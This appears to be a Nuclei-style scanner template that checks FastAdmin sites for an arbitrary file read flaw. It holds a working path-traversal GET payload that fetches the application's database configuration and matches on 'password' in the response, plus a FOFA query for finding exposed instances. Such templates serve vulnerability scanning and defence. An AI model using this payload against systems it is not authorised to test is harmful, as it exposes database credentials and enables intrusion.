http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - jsonpReturn
            - database
            - password
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/index/ajax/lang?lang=..//..//application/database'
id: fastadmin-lfi
info:
    author: Hel10-Web
    classification:
        cpe: cpe:2.3:a:fastadmin:fastadmin:*:*:*:*:*:*:*:*
    description: |
        Arbitrary file reading vulnerability exists in Fastadmin framework.
    metadata:
        fofa-query: app="FASTADMIN-框架"
        max-request: 1
        product: fastadmin
        vendor: fastadmin
        verified: true
    name: Fastadmin framework - Arbitrary File Read
    reference:
        - https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
    severity: high
    tags:
        - fastadmin
        - FastAdmin
